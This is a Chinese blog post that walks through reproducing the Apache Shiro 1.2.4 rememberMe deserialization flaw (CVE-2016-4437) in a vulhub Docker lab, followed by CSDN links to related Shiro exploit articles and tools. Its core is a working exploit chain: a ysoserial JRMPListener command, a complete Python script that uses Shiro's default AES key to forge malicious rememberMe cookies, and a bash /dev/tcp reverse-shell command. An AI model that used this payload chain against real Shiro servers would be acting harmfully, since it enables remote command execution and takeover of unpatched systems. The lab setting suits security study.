shiro反序列化漏洞复现(CVE-2016-4437)

于 2024-05-19 13:41:05 发布
阅读量290 收藏 5
点赞数 4
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70349048/article/details/139036206
版权

参考文章:

[漏洞复现]Apache Shiro 1.2.4反序列化-腾讯云开发者社区-腾讯云

Apache的Shiro框架提供了记住我的功能(RememberMe)省去用户短时间内再次登录输入账号密码的操作,用户登录成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。服务端在接收cookie时:

检索RememberMe Cookie的值Base 64解码AES解密(加密密钥硬编码)进行反序列化操作(未过滤处理)

使用Java序列化 ---> 使用密钥进行AES加密 ---> Base64加密 ---> 得到加密后的Remember Me内容

同时在识别用户身份的时候,需要对Remember Me的字段进行解密,解密的顺序为:

Remember Me加密内容 ---> Base64解密 ---> 使用密钥进行AES解密 --->Java反序列化

攻击者可以使用Shiro的默认密钥构造恶意序列化对象进行编码来伪造用户的Cookie,服务端反序列化时触发漏洞,从而执行命令。

问题出在AES加密的密钥Key被硬编码在代码里,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。

这里使用vulhub进行复现,进入CVE-2016-4437执行

docker compose up -d

使用docker ps查看服务端口8080

测试漏洞存在情况: 

抓取登录重放包,可以看到rememberMe=deleteMe字段,很可能存在漏洞

使用反序列化利用工具来监听7878端口

这里需要ysoserial和marshalsec配合使用,在攻击机上面启动marshalsec,然后在ysoserial目录下面含有pom.xml的目录下执行:

source /etc/profile
mvn -v (查看mvn版本)
mvn clean package -DskipTests

需要切换到含有jar包的目录下面执行

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 7878 CommonsCollections5 "ping ykzx0g.dnslog.cn"

然后生成payload:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):    
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)    
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()  
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") #这里替换密钥
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)    
    file_body = pad(popen.stdout.read())    
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))    
    return base64_ciphertext
    
if __name__ == '__main__':   
    payload = encode_rememberme(sys.argv[1])    
    print("rememberMe={0}".format(payload.decode()))

将生成的payload复制到请求包cookie的位置, 发包

可以看到监听端口有流量

然后看看doslog平台有没有回显,发现执行成功!

接下来是反弹shell

linux的反弹shell是

bash -i >& /dev/tcp/127.0.0.1/8888 0>&1

这里需要将反弹shell的命令进行java base64编码处理

编码网站

Runtime.exec Payload Generater | AresX's Blog

重新生成payload,发送包

 可以看到,已经能够远程执行任意命令了

反弹shell成功!

就不做程序猿
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro-cve_2016_4437漏洞复现
0day
01-29 815
shiro-cve_2016_4437漏洞复现 漏洞概述: 该漏洞发布于2016年6月,属于java反序列化漏洞的一种,Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现
最新发布
qq_55202378的博客
05-11 770
如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~):勾选记住密码选项后,点击登录,抓包,观察请求包中是否有。注意:这里java版本要用java8。,加一个环境变量,就可以用了~
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
good good study
03-28 9335
Shiro 1.2.4 反序列化漏洞
Apache Shiro 身份认证绕过漏洞CVE-2022-32532
qq_24380005的博客
07-01 1860
Apache Shiro官方与6月28日修复了一个身份认证绕过漏洞CVE-2022-32532,漏洞内容为当在Apache Shiro中使用RegexRequestMatcher进行权限配置并且配置的正则表达式中存在”.”时,可以通过构造恶意数据包的方式绕过身份验证,导致权限控制失效。官方描述 漏洞修复版本 Apache Shiro < 1.9.1目前Apache官方已发布此漏洞修复版本,建议用户尽快升级至Apache Shiro 1.9.1及以上版本。 将Apache Shiro版本升级到1.9.1及以
shiro CVE-2020-1957
王嘟嘟的博客
02-19 889
也就是说,shiro认为/a/1/是一个不需要授权就可以访问的接口,但是spring认为/a/1/访问的是/a/1需要授权的接口,spring认为shiro安全的,所以直接放行了。
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
Apache Shiro 反序列化漏洞复现CVE-20164437
又菜又爱倒腾的博客
10-29 1712
#Apache Shiro 反序列化漏洞CVE-20164437)# 一、漏洞简介 Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、漏洞影响 影响版本 Apache Shiro <=
Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)复现
whojoe的博客
05-10 1327
Shiro RememberMe 1.2.4 反序列化漏洞复现前言开始环境搭建工具准备1.shiro_poc.py2.ysoserial的jar文件安装模块开始执行参考文章 前言 接下来一段时间要做漏洞复现和代码审计,算是一个小目标把 开始 环境搭建 使用docker复现 启动docker systemctl start docker 下载镜像和启动环境 docker pull medicean/vulapps:s_shiro_1 docker run -d -p 81:8080 medicean/vul
[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE-2022-32532)
qq_51577576的博客
08-05 4617
​ Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API,您可以快速、轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 WEB 和企业应用程序。...
shiro安全框架的2个CVE漏洞复现
tpaer的博客
09-25 1171
shiro是apache下的一个java安全框架,通常用来进行授权和认证,相比于同样流行的spring security框架,shiro更加轻量更好上手使用的人也更多。此文复现环境为vulhub靶场,以下将复现靶场中的两个shiroCVE漏洞
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
m0_61506558的博客
11-06 2519
关于shiro在2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化漏洞,(一)基本介绍。
框架漏洞-CVE复现-Apache Shiro+Apache Solr
xiaoheizi的博客
07-19 493
描述:Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于在挖掘框架自身的漏洞。描述:Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理。
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
rumil的博客
11-02 1647
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。
shiro反序列化漏洞复现
07-28
Apache Shiro反序列化漏洞是指攻击者可以利用Shiro框架中的反序列化漏洞,通过构造恶意的序列化数据,来执行任意代码或者获取敏感信息的漏洞。攻击者可以通过发送恶意请求或者利用其他漏洞来触发该漏洞,从而实现攻击目的。为了防止该漏洞的利用,建议及时更新Shiro框架版本,并加强对系统的安全防护措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值